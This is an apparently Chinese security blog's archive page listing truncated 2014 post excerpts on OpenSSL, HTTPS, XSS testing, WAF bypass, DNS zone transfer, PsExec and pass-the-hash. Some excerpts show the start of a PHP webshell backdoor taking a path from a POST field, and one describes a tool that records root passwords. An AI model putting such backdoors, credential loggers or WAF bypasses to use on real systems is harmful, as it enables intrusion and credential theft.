admin的文章

12年前 (2014-05-25) 1815浏览 0评论

今天是一个特别的日子，早上大家还在讨论XP停止服务的事，到处是相关的新闻和文章，到了下午，到处都是OpenSSL的漏洞消息了。   OpenSSL与SSL安全协议   什么是SSL安全协议，我记得在10年我写过一篇简单介绍的文章，小谈...

12年前 (2014-05-25) 2775浏览 0评论

一、Start Apache 2 Server /启动apache服务 # /etc/init.d/apache2 start or $ sudo /etc/init.d/apache2 start 二、 Restart Apache 2 Serve...

12年前 (2014-05-25) 4321浏览 0评论

0×00 渗透的很多时候，找到的工具并不适用，自己码代码才是王道，下面三个程序都是渗透时在网络上找不到合适工具，自己辛苦开发的，短小使用，求欣赏，求好评。 0×01 记录root密码小工具 root.py #!/usr/bin/python imp...

12年前 (2014-05-25) 2035浏览 0评论

*本文阐述的漏洞已被上报锤子科技并已确认修补。 Smartisan OS是锤子科技推出基于Android定制的移动操作系统。该系统于去年3月27日在国家会议中心由罗永浩首次公布。在2014年4月11日发布V0.9.9.7 alpha版本中，系统新增...

12年前 (2014-05-25) 2905浏览 1评论

这个后门是在渗透某站时遇到的，贴代码： <?php $f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"]; $c = $_POST[&quo...

12年前 (2014-05-25) 2331浏览 0评论

XXX之前有提过multipart请求绕过各种WAF方式：360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一，貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了，不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文...

12年前 (2014-05-25) 2656浏览 0评论

转自：http://blog.internot.info/2014/05/sql-injection-on-ebaycomau-subdomain.html Whilst looking for some bugs in ebay, I came a...

12年前 (2014-05-24) 2497浏览 0评论

HTTPS那些事（一）HTTPS原理 楔子 谣言粉碎机前些日子发布的《用公共WiFi上网会危害银行账户安全吗？》， 文中介绍了在使用HTTPS进行网络加密传输的一些情况，从回复来看，争议还是有的。随着网络越来越普及，应用越来越广泛，一些网络安全问题...

12年前 (2014-05-24) 3958浏览 0评论

看到一篇文章《解开人人网登录密码的 RSA 加密》，文章中提到人人网为了避免密码的明文传输，使用了纯javascript实现的RSA库来对用户的密码进行加密传输。该javascript实现的RSA库的主页是：http://www.ohdave.com...

12年前 (2014-05-23) 2869浏览 1评论

转自：https://boj.blog.ustc.edu.cn/index.php/2014/03/ostc-2014-minutes/ 昨天受科大 LUG 之邀参加了 CSDN 主办的 2014 开源技术大会（OSTC），结合会上记的笔记和不靠谱...

12年前 (2014-05-23) 2060浏览 0评论

一直以来，电信通过HTTP劫持推送广告的方式已经存在了很多年了，这种手段至今并未停止。这种手段月光博客曾经有多次曝光，见《电信级的网络弹出广告》、《获取了电信恶意弹出广告的罪证》和《谁控制了我们的浏览器？》。虽然HTTP本身的不安全性导致有路由器控制...

12年前 (2014-05-23) 2432浏览 0评论

世界上有两种密码：一种是防止你的小妹妹偷看你的文件；另一种是防止当局阅读你的文件。 —— Bruce Schneier《应用密码学》 传说中的 “明文密码” 有两种形式：明文传输和明文存储。明文传输的密码不一定明文存储，明文存储的密码也不一定明文传...

12年前 (2014-05-23) 9302浏览 0评论

感谢匿名人士的投递QQ网站登录处没有使用https进行加密，而是采用了RSA非对称加密来保护传输过程中的密码以及敏感信息的安全性。 QQ是在javascript中实现整个过程的。这个想法非常新颖，但是也是存在严重缺陷的。如果被黑客利用，则可能被捕获明...

12年前 (2014-05-23) 2474浏览 0评论

现在很多网站访问的时候都需要提供证书才能够正常访问，只对IE浏览器里面安装过证书的用户提供访问，这样可以让网站更具的安全性。不过证书有时候也增加了我们的麻烦，如当我们去访问一个网站的时候，有时候会报有关证书的错，虽然IE浏览器里面已经安装过了相应的...

12年前 (2014-05-23) 3968浏览 0评论

IE浏览器中已经内置了大量证书颁发机构的公钥，通过下面的操作我们可以查看到已经被信任的证书颁发机构。在IE浏览器的菜单中点击“工具 /Internet选项”，选择“内容”标签，点击“证书”按钮，然后就可以看到IE浏览器已经信任了许多“中级证书颁发机...

12年前 (2014-05-19) 4071浏览 2评论

初始测试   1、使用无害的payload，类似<b>,<i>,<u>观察响应，判断应用程序是否被HTML编码，是否标签被过滤，是否过滤<>等等； 2、如果过滤闭合标签，尝试无闭合标签的pa...

12年前 (2014-05-19) 2868浏览 0评论

1、DNS传送域漏洞 linux 下nmap dnsenum windows下nslookup 某些域名比如有ns1.dis9.com ns2.dis9.com 有时候NS2就可以利用 2、暴力破解 windows下Demon(JSKY自带那个) ...

12年前 (2014-05-19) 2419浏览 0评论

PSEXEC has been a staple for Windows post exploitation pivoting and system administration for a long while. The basic premise...

12年前 (2014-05-19) 2214浏览 1评论

        一 摘要 注意：本文所讨论的各种情况均默认发生在win NT/2000环境下，win98将不在此次讨论之列。 二 什么是ipc$ IPC$(Internet Process Connection)是共享”命名管道̶...

12年前 (2014-05-19) 2501浏览 0评论

知识库：使用Hash直接登录Windows zone：使用Hash直接登录Windows 由于msf用到exploit/windows/smb/psexec模块，所以猜想和pstool里面的PsExec.exe应该有些许联系 查看说明，PsExec....